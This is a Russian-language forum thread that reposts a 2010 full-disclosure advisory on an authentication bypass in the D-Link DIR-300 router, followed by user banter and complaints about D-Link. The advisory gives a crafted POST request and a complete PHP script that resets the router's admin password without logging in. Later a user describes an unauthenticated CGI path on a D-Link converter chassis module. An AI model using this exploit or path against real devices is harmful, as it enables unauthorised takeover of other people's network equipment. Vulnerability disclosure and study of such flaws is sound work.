--}}
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем

Константину Бебенину и пользователям DIR-300 информация к размышлению.

Сисадминское
29
49
С друзьями на NN.RU
В социальных сетях
Поделиться
Cunning
12.11.2010
securityvulns.ru/Zdocument119.html

Больше всего порадовало
[History]

- Information sent to vendor 07.08.2010
- No response
- Information resended to vendor 07.31.2010
- No response from vendor

--- далее текст из ссылки

[intro]
Hello, I found security bug in D-Link DIR-300 wireless router. It can
be used to bypass authentication mechanizm by attacker with access to
web interface. I reported it to D-Link but they are not replying for
my emails. According to other D-Link security holes and their status I
think that they won't reply, so I decided to write about it here.

[Technical details]

Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---
POST 192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_N
EED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
---cut here---

If attacker makes this request to the control panel, the
administrator username is set to admin with password ,,uhOHahEh".

[Affected]

- All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
- There is possibility that other dlink devices which use the same php
scripts in control panel are affected. I'm not able to check it
because I don't have devices for tests. I'm counting on you ;->

[Code]

---cut here---
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&
NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".
urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
echo "- Error: could not connect (
http://$argv[1]:$argv[2]/tools_admin.php).\n";
exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"Successfully")===false) {
echo "- something goes wrong (check answer - answer.html) !\n";
$f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
exit;
}
else
echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
---cut here---

[History]

- Information sent to vendor 07.08.2010
- No response
- Information resended to vendor 07.31.2010
- No response from vendor


[Credits]
Karol Celinski ( Celin )
Pentester/Researcher @ Safe Computing

[Contact]

karol at celin dot pl

[Greetz]
Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
members.
partorg
12.11.2010
Ничего не понял.

В двух словах - Д-линк говно или нет?
Cunning
12.11.2010
Почитай внимательнее!

I found security bug in D-Link DIR-300 wireless router. It can
be used to bypass authentication mechanizm by attacker with access to web interface.

Вот такие у нас админы бывают... даже багрепорт не осиливают на пиндосском...
KLIMMER
12.11.2010
он не админ
тема эта уже была
partorg
12.11.2010
Ну то, что админы зачастую малограмонтные лентяи - это я знаю. Но чёт смысла прикола я ниасилил. Видимо, туповат. :)
Cunning
12.11.2010
В общем не пользуй DIR-300! :)
partorg
12.11.2010
Кстати, подумываю сделать беспроводную сетку дома. Инфу про дир-300 принял, спасибо. :)
т.е. если админский пароль изменен, аутентификация по МАСу + ВПА2, то его всеравно можно сломать?
Stinky
12.11.2010
Первое что я сделал со своим - зашил в него dd-wrt, такшта пофиг :)
А мне можно объяснить - почему?
И где сейчас можно купить новый DIR-300?
Cunning
12.11.2010
Сейчас новый уже сильно врятли, но мы с надеждой ждем новых дырок в новых продуктах! :)
tsolodov
12.11.2010
Впревые эта бага нашлась еще в 2008 году на оптических конвероторах. См. сайт хакер.
Cunning
12.11.2010
Тогда странно, что Д-Линк до сих пор "не почесался"....
pl17
12.11.2010
надо учитывать контекст
это странно что нормальная фирма не почесалась устранить
для Д-линк это не странно
Факты можете привести или просто так бормочем - для поддержания разговора?
pl17
12.11.2010
фактов было предостаточно
Можно привести по теме?
Молоточков и меток у меня до фига, все вот думаю - куда бы их использовать по делу. Готов использовать.
pl17
13.11.2010
шла бы ты в жопу, красавица, со своими угрозами
тебе какие факты надо?
что д-линк выпускает говно оборудование? так повторяться я не собираюсь, говорено не раз и не два, а вот из свежего, на точке пропадает сеть, перезапуск свича оживляет сеть на 10-60 секунд, заменена 3!!!!!!!!!! одинаковых свичей ни к чему не приводит, , однако подключение всего в роутер напрямую позволяет сети работать. намекну название фирмы, произведшей 3!!! неисправных свича в одной партии, начинается на букву "Д"

пример второй. мой личный модем, ребутать приходилось раз в сутки, СТАБИЛЬНО каждый вечер приходишь с работы и ребутаешь модем иначе инет не появится (и обновление прошивки не помогает). а потом этот модем просто сдох, еле прожил год. подсказка фирма-производитель та же самая.

в 90% случаев, если на точке проблемы с сетью и по приезду я вижу свич производства этой непогрешимой компании, проблема оказывается именно в этом свиче.

и кроме злоебаных меток вам нечего предъявить и все это знают
partorg
13.11.2010
pl17 писал(а)
шла бы ты в жопу, красавица, со своими угрозами

*испуганно прячется под стол*

Сейчас нам всем дадут молотков!!!
Скажите, а как вы относитесь к материнским платам фирмы MSI?
pl17
13.11.2010
никогда не брал, все больше асус и гигабайт, никак не отношусь
tsolodov
13.11.2010
Когда устарните баг хеша на дес 3028? (ответ сам знаю, что никогда)
Да и вообще у вас глюк на глюке, починете один, появится другой. А решение у длинка всегда простое - вот вам новая прошивка))) В названии всегда фигурирует буква B, как я понимаю это означает beta))) У вас стабильные рабочие версии есть вообще?
Раз ответ знаете, то наверно и в курсе того, что проблема в чипсете, который делаем не мы, а Broadcom. И проблема эта есть практически у всех современных акцессных свичей вне зависимости от производителя. Зайдите на Наг и почитайте - там это обсуждалось долго и со всевозможными тестами.
tsolodov
13.11.2010
)) Свалили все на другую контору.....
Что значит "свалили на другую контору"? На этих чипсетах свичи кто только не делает и у всех проблема с хэшами. Одна и та же.
Вот Вы много чипсетмейкеров для свичей знаете и есть ли альтернатива?
tsolodov
13.11.2010
да мне пофиг на то, у кого вы берете чипсеты, проблема в вашем оборудовании в итоге.
Эта проблема будет в любом оборудовании на этом чипсете.
У того же DES-3528 с хешами все значительно лучше, но он просто дороже, хотя и функциональнее. Их не покупаете?
tsolodov писал(а)
Впревые эта бага нашлась еще в 2008 году на оптических конвероторах


Ого... Прям-таки на медиаковерторах? Там можно было программно что-то сломать?
А ссылку можно на это предоставить?
Т.к. тема адресована ко мне, то молоток я на всякий случай заготовил (предупреждаю).
Cunning
12.11.2010
Для кого? (на всякий случай интересуюсь) :)
Для написавшего это
tsolodov
13.11.2010
Konstantin Bebenin писал(а)
tsolodov писал(а)
Впревые эта бага нашлась еще в 2008 году на оптических конвероторах


Ого... Прям-таки на медиаковерторах? Там можно было программно что-то сломать?
А ссылку можно на это предоставить?
Т.к. тема адресована ко мне, то молоток я на всякий случай заготовил (предупреждаю).

Пардон, баг на модуле управления корзиной конверторов, dmc .... что то там. Короче вам лучше модель знать.

А ссылку можно в гугле найти. Думаю у вас получится. И не надо тут пугать молотками))
Еще раз спрашиваю (последний): эта бага (возможность подмены админской учетки при доступе к устройству извне по "серому" адресу) как была обнаружена на DMC-1000? Раз уж Вы сказали, что она есть, то и сам можете дать ссылку.
tsolodov
13.11.2010
Эта бага, при которой можно вызвать форму изменения пароля, управления модулями, спомощью cgi-скриптов.
Попробуйте вот:


ОПИСАНИЕ УЯЗВИМОСТИ В ПРИМЕРАХ

Допустим наш модуль находиться на IP-адресе 127.0.0.1/, при обращении всё как положено - требует пароль и логин, после авторизации пускает... НО!!! Одно большое но - если к его адресу дописать несколько строк чтобы получилось 127.0.0.1/cgi-bin/media.cgi?home=chassis, то происходит чудо!!! Он не требует ни пароля ни логина и сразу выводит менюшку управления конверторами в которой их можно и отключить и поменять настройку на каждый отдельно взятый конвертер и т.д. Сначала думали, что это куки, но после удаления оных и совершенно не нужного ребута машины при попытке зайти туда (предварительно специально НЕ авторизовывались на нём) он всё так же безропотно без логинов и паролей пускает к себе в менюху управления конверторами.


Как я понял, смысл сабжа такой же.

ps. вызвать форму изменения пароля тоже не сложно, если знать путь к ней.

ссылку не дам.....кто ищет тот всегда найдет)
Еще раз: Вы реально извне сможете это сделать? На чужой корзине.
tsolodov
13.11.2010
Ага, если есть доступ к веб морде, и если конечно не закрыли этот баг другой прошивкой.
Проверено на практике, оказывается полезным, когда теряешь пароль от модуля)))
Immort@l
12.11.2010
класс. надо записать. буду искать рядом диры 300)
FreeCat
12.11.2010
Мой уже в Москве)).
RoMih
12.11.2010
а у мну прошивка dd-wrt :)
@ngry
12.11.2010
вы что, ежедневно решили это обсуждать?
bypass authentication mechanizm by attacker with access to
web interface
.
В принципе, если у аттакера уже есть доступ к веб-интерфейсу, значит уже что-то не так.
это слишком сложное умозаключение. лучше радостно побухтеть про ленивую контору.

"Если у воров есть ключи от вашей квартиры, они могут заменить ваш замок на другой". Ай-яй-яй, какие херовые производители замков, уже который год не чешутся...
Теперь и здесь тема есть, на интернет-нн есть (я там как раз все это комментирую). Рекомендую включить мозг, еще раз перечитать начальное сообщение (на польско-английсом), подумать, почитать тему на интернет-нн (ссылка ниже есть).

Жду тему на жалобке и городском )))))))))))))
Shreder
12.11.2010
я думаю, кошерно еще будет на веб-разработчиках завести тему, на городском и на авто
Еще на Свободке и СП )))))))
Shreder
13.11.2010
да, на авто тогда не надо, достаточно на СП
FreeCat
13.11.2010
Konstantin Bebenin писал(а)
Жду тему на жалобке и городском )))))))))))))

С Городского всё равно на Техно или Инет перекину, можно не стараться).
partorg
13.11.2010
Дядя Костя радует. Продолжаю с интересом читать его сверхинформативные сообщения и с каждым новым становлюсь всё умнее.
Жень! Пиши про.... про голых баб лучше, а?

ЗЫ. Бебенин тут вообще не при делах. Если кому и писать - так уж Крутских.
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем
Последние темы форумов
Форум Тема (Автор) Последний ответ Ответов
Сетевой фильтр APC Surge Arrest

Сетевой фильтр APC Surge Arrest для радиолюбителя.и не только Отправка в регионы после оплаты. ЦЕНА 3000 руб. В рабочем состоянии....
Цена: 3 000 руб.

Оперативная память Corsair XMS3 CMX8GX3M2A1600C9

Оперативная память Corsair XMS3 CMX8GX3M2A1600C9 Отправка в регионы после оплаты. Продаются сразу обе. Цена за обе 2000 руб....
Цена: 1 000 руб.

Материнские платы на запчасти и не только

Материнские платы на запчасти и не только Материнские платы и другие комплектующие Отправка в регионы после оплаты. Транспортной...
Цена: 3 000 руб.

Принтер лазерный HEWLETT PACKARD HP-6L

Принтер лазерный HEWLETT PACKARD HP-6L Отправка в регионы после оплаты. 3штуки БУ. Внешний вид из магазина простояли на складе...
Цена: 4 500 руб.